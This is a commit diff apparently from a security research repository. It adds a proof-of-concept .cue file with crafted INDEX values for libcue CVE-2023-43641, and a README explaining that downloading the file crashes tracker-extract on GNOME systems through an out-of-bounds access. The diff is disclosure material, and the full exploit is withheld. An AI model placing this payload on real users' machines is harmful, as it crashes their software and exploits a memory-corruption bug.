Merge pull request #792 from kevinbackhouse/CVE-2023-43641-poc-simple

kevinbackhouse · web-flow · commit 27a40ad427d5 · 2023-10-09T18:04:56.000+01:00
Files for disclosure of libcue CVE-2023-43641
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue
@@ -0,0 +1,6 @@
+FILE pwned.mp3 MP3
+TRACK 000 AUDIO
+MESSAGE "simple poc for CVE-2023-43641"
+INDEX 4294567296 0
+INDEX 4290967296 0
+INDEX 4254967296 0
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md
@@ -0,0 +1,5 @@
+# CVE-2023-43641
+
+This directory contains a simple PoC for libcue [CVE-2023-43641](https://github.com/lipnitsk/libcue/security/advisories/GHSA-5982-x7hv-r9cj). Downloading [CVE-2023-43641-poc-simple.cue](CVE-2023-43641-poc-simple.cue) should trigger the bug on most GNOME systems, because [tracker-miners](https://gitlab.gnome.org/GNOME/tracker-miners) automatically scans files in `~/Downloads`. If the filename has a `.cue` extension, then tracker-miners uses [libcue](https://github.com/lipnitsk/libcue) to scan the file. The PoC triggers an out-of-bounds array access, which causes the tracker-extract process to crash.
+
+We are delaying the release of the [full PoC](https://youtu.be/beOwspTnc1Y), which exploits the vulnerability to get code execution in tracker-extract.
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png
